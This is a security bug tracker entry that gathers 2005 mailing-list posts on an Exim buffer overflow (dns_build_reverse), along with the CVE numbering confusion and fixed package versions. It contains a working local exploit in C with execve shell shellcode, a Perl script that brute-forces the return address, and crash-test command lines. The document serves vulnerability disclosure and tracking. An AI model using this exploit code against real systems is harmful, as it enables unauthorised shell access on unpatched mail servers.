Bug 64890 (CVE-2005-0022)

* This comment was added by mail.
An exploit, do not trust the shellcode!

Date: Sat, 15 Jan 2005 19:19:33 +0100
From: Rafael San Miguel Carrasco <smcsoc@yahoo.es>
To: bugtraq@securityfocus.com
Subject: exim dns_buld_reverse() proof-of-concept


This proof-of-concept demonstrates the existence of the vulnerability 
reported by iDEFENSE (iDEFENSE Security Advisory 01.14.05).
It has been tested against exim-4.41 under Debian GNU/Linux.
Note that setuid () is not included in the shellcode to avoid 
script-kidding.
My RET is 0xbffffae4, but fb.pl can brute-force it for you.

---------
fb.pl:
---------

#!/usr/bin/perl

$cnt = 0xbffffa10;

while (1) {
   $hex = sprintf ("0x%x", $cnt);
   $res = system ("./exploit $hex");
   printf "$hex : $res\n";
   $cnt += 4;
}

---------
exploit.c:
---------

#define NOP 0x90
#define TAMBUF 368
#define INIC_SH 20
#include <stdlib.h>

int main (int argc, char **argv) {

   static char shellcode[]=
   "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
   "\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e"
   "\x2f\x73\x68\x58";

   char buffer [TAMBUF + 1];
   char cadena [TAMBUF + 5];
   int cont;
   unsigned long ret = strtoul (argv[1], NULL, 16);

   for (cont = 0; cont < TAMBUF / 4; cont++)
           *( (long *) buffer + cont) = ret;

   for (cont = 0; cont < strlen (shellcode); cont++)
           buffer [cont + INIC_SH] = shellcode [cont];

   for (cont = 0; cont < INIC_SH; cont++)
           buffer [cont] = NOP;

   buffer [TAMBUF] = 0;
   printf ("RET = 0x%x\n", ret);
   strcpy (cadena, "::%A");
   strcat (cadena, buffer);
       execl ("./exim", "./exim", "-bh", cadena, (char *) 0);
}



-------------------------------
Rafael San Miguel Carrasco
Consultor Técnico - Jefe de Proyecto
rafael.sanmiguel@dvc.es
+ 34 660 856 647
+ 34 902 464 546
Davinci Consulting - www.dvc.es
Oficina Madrid - Parque empresarial Alvento
Via de los Poblados 1 Edificio A 6ª planta
28033 Madrid
-------------------------------

Confusing:

Date: Sun, 16 Jan 2005 14:25:28 +0100
From: Marc Haber <mh+full-disclosure@zugschlus.de>
To: customerservice@idefense.com
Subject: Re: [Full-Disclosure] iDEFENSE Security Advisory 01.14.05: Exim
        dns_buld_reverse() Buffer Overflow Vulnerability
Cc: exim-users@exim.org, full-disclosure@lists.netsys.com
X-Spam-Status: No, hits=-5.9 tagged_above=-20.0 required=5.0 tests=BAYES_00,
 MY_LINUX

Hi,

On Fri, Jan 14, 2005 at 12:41:05PM -0500, idlabs-advisories@idefense.com wrote:
> Exim dns_buld_reverse() Buffer Overflow Vulnerability

That would have to be dns_build_reverse

> iDEFENSE Security Advisory 01.14.05
> www.idefense.com/application/poi/display?id=183&type=vulnerabilities

That web page is only viewable with JavaScript enabled, and is thus
unviewable with a browser configured to minimize the surfing risk. For
a security-related organization, I consider this poor design.

> /usr/bin/exim -bh ::%A`perl -e 'print pack('L',0xdeadbeef') x 256'`

That one is syntactically invalid, and neither of the obvious fixes
does result in a crash on Debian sid. exim 4.34-9, dated 2004-12-08,
correctly complains that it is unable to parse the parameter as an
IPv6 address and exits with an exit code of 1. The same happens with a
locally built 4.41 without Debian patches.

> iDEFENSE has confirmed the existence of this vulnerability in Exim
> versions 4.40 and 4.41. A source audit of version 4.42 suggests that it
> is also vulnerable. It is suspected that earlier versions are also
> vulnerable.

According to the upstream author's advisory, released ten days before
the date of the advisory I am replying to, 4.43 is vulnerable as well.

> V. WORKAROUND
>
> iDEFENSE is currently unaware of any effective workarounds for this
> vulnerability.

However, exim's author has released a patch addressing this
vulnerability ten days before the release of the advisory stating
there are no effective workarounds.

So you are basically saying that the patch from Philip Hazel is
uneffective?

> VI. VENDOR RESPONSE
>
> A patch for Exim release 4.43 which addresses this vulnerability is
> available at:
>
>    http://www.exim.org/mail-archives/exim-announce/2005/msg00000.html

Is that patch an effective workaround, or is it not?

> The patch will be incorporated into a future Exim release (4.50).

There is also an interim release 4.44 incorporating the patch:

http://www.exim.org/mail-archives/exim-announce/2005/msg00001.html

I find it also interesting that the release message references two
iDEFENSE notification messages which reference numbers have not been
included in the final advisory as released by iDEFENSE.

> > VII. CVE INFORMATION
>
> A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
> been assigned yet.

CAN-2005-0021 and CAN-2005-0022 have been assigned on 2005-01-04, ten
days before the date of the advisory stating that no CVE number has
been assigned.

> VIII. DISCLOSURE TIMELINE
>
> 09/30/2004  Initial vendor notification
> 09/30/2004  Initial vendor response
  01/04/2005  Vendor releases a patch
  01/14/2005  Vendor releases interim release incorporating the patch
> 01/14/2005  Public disclosure

> IX. CREDIT
>
> The discoverer of this vulnerability wishes to remain anonymous.

I can fully understand that. The entire advisory seems to be _very_
sloppily prepared, or to have been unduly delayed and passed by
reality before it was finally released.

If this advisory addresses CAN-2005-0021 and/or CAN-2005-0022, it
should not have been released in the first place. If it addresses a
new vulnerability, it should be more clear in that regard. And it
should include code that actually allows to reproduce the vulnerability.

Just for the record:
The following package versions of exim and exim4 in Debian/GNU Linux
fix the vulnerabilities listed in CAN-2005-0021 and CAN-2005-0022:

exim4     4.43-2         experimental
exim4     4.34-10        unstable, testing
exim      3.36-13        unstable, testing
exim      3.35-1woody4   stable
exim-tls  3.35-3woody3   stable

Greetings
Marc

--
-----------------------------------------------------------------------------
Marc Haber         | "I don't trust Computers. They | Mailadresse im Header
Mannheim, Germany  |  lose things."    Winona Ryder | Fon: *49 621 72739834
Nordisch by Nature |  How to make an American Quilt | Fax: *49 621 72739835
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Indeed. I was just about to append that one as well. 

I can't crash a supposed to be vulnerable exim (4.30) either:

root@aust ~PP/exim/9.1-i386
 # exim -bV
Exim version 4.30 #1 built 06-Apr-2004 02:50:40
[...]
root@aust ~PP/exim/9.1-i386
 # exim -bh ::%$( perl -e "print pack('L',0xdeadbeef) x 256;" )
[...]
LOG: unable to parse [...] as an IPv6 address
zsh: 11665 exit 1     exim -bh ::%$( perl -e "print pack('L',0xdeadbeef) x 256;" )


Exactly the same result with unpatched 4.42 from 9.2.
Same with patched 4.42 from 9.2, and 4.43.

4.44 behaves different, it parses the address as
0000:0000:0000:0000:0000:0000:0000:0000 and does not quit.

So, is there any indication that the bug reported here is NOT the same
as bug 64675 (CAN-2005-0021)? I think, no.

No (public) response from iDEFENSE so far (just checked bugtraq,
full-disclosure and exim-users again).

I have no idea. I'm going to approve the already committed packages then 

Subject: [Full-Disclosure] iDEFENSE Security Advisory 01.14.05: Exim
        dns_buld_reverse() Buffer Overflow Vulnerability
Date: Wed, 19 Jan 2005 11:12:00 -0500
From: customer service mailbox <customerservice@idefense.com>
To: full-disclosure@lists.netsys.com
Cc: mh+full-disclosure@zugschlus.de
X-Spam-Status: No, hits=-4.9 tagged_above=-20.0 required=5.0 tests=BAYES_00

There has been some confusion over the CVE numbers issued for three
recently released Exim security vulnerabilities. In discussions with
both Mitre and the Exim maintainers, a decision has been made to issue
the following CVE numbers for these vulnerabilities:

Exim dns_buld_reverse() Buffer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=183&type=vulnerabilit
ies
CAN-2005-0021

Exim host_aton() Buffer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=179&type=vulnerabilit
ies
CAN-2005-0021

Exim auth_spa_server() Buffer Overflow Vulnerability
http://www.idefense.com/application/poi/display?id=178&type=vulnerabilit
ies
CAN-2005-0022

The determination was made by Mitre to combine the dns_buld_reverse()
and host_aton() into a single CVE number due the fact that they are both
buffer overflows addressed by the same patch.

>> /usr/bin/exim -bh ::%A`perl -e 'print pack('L',0xdeadbeef') x 256'`

>That one is syntactically invalid, and neither of the obvious fixes
>does result in a crash on Debian sid. exim 4.34-9, dated 2004-12-08,
>correctly complains that it is unable to parse the parameter as an
>IPv6 address and exits with an exit code of 1. The same happens with a
>locally built 4.41 without Debian patches.

Marc - I appreciate your bringing this to our attention. You are correct
that the code was syntactically invalid. We have updated the advisory
with the following code:

   /path/to/exim-binary -bh ::%A:::::::::::::::::`perl -e 'print
pack("L",0xdeadbeef) x 256'`

Lastly, the wording of the Vendor Response section has been updated to
clarify the correct vendor fix for this issue.

   "The vulnerability has been fixed in Exim release 4.44."

The public advisories on the iDEFENSE web site have been updated to
reflect these changes.

My apologies for the confusion.

Regards,

Michael Sutton
Director, iDEFENSE Labs

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

*** This bug has been marked as a duplicate of 64675 ***

CVE-2005-0022: CVSS v2 Base Score: 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P)